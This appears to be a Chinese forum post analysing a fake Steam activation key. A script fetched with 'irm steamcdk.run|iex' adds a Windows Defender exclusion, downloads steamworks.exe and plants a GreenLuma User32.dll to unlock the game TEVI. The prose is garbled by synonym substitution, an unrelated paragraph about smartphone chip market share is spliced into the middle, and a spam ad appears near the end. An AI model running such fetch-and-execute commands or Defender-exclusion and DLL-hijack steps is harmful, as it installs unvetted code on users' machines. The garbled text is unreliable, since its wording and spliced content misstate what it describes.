在某宝买了一个伪造的steam游戏激活码，要激活的游戏名TEVI，浅显分析一下系数这个词入库经由

01 irm steamcdk.run|iex 行径分析

该辅导探望域名为steamcdk.run的网页并实施其剧本

在剧本中检测了处置员权限

接着，剧本尝试取得 Steam 的装配旅途，并查抄 Windows Defender 是否正在脱手。要是 Windows Defender 正在脱手，则将 Steam 装配旅途添加到 Windows Defender 的摒除旅途中。

然后从图中麇集下载steamworks.exe到steam目次中

临了脱手该门径

02 steamworks.exe行径分析

检察steamworks.exe的信息，是一个C++愚弄门径

给与脱手steamworks.exe，会强制退出steam平台的程度

接着steamworks.exe开释python守旧库到临时文献夹中，其中background.jpg等3张图片是steam序列号激活游戏的界面

门径实施几秒后弹出界面

由于此时steam已强制退出，不难猜到该界面恰是刚刚提到的临时文献夹中的图片画图而成

将某宝店家提供给咱们的CDK提交，发现通过收罗下载了文献2230650.zip

通过steamdb查询咱们要激活的游戏TEVI，发现TEVI的ID恰是2230650

解压2230650.zip后得到

其中包含了TEVI的清单文献2230651_5704585057152086627.manifest和密钥文献

根据市场调研机构Canalys的数据，联发科在智能手机处理器市场占据第一位，市场份额达到39%，高通以25%的份额紧随其后，苹果以16%的份额位列第三。而在第四位则是紫光展锐，市场份额达到了9%。

揣摸是由steam免费入库器用SteamTools生成

澄澈店家提供给咱们的"游戏CDK"骨子上是游戏的记号ID，通过该ID下载对应的游戏免费入库包

接着steamworks.exe将TEVI的清单文献2230651_5704585057152086627.manifest拷贝到steam目次下的depotcache文献夹中，况兼修改了包括config.vdf在内的一部分拨置文献

然后在steam目次下写入一个User32.dll

03 User32.dll行径分析

澄澈User32.dll是为了劫抓注入，在IDA中检察发现具有GreenLuma字符串

通过搜索引擎查找GreenLuma，发现这亦然一个steam入库器用

澄澈steamworks.exe通过GreenLuma进行劫抓注入，通过之前得到的TEVI的清单文献2230651_5704585057152086627.manifest和密钥文献进行解锁

临了，弹出激活生效的窗口并重启steam

[培训]科锐软件逆向50期预科班报名行将放手微博小号怎么买多少钱，速来！！！ 50期崇拜班报名火爆招生中！！！

• 安全
• Steam
• 激活
• 志趣
• 志趣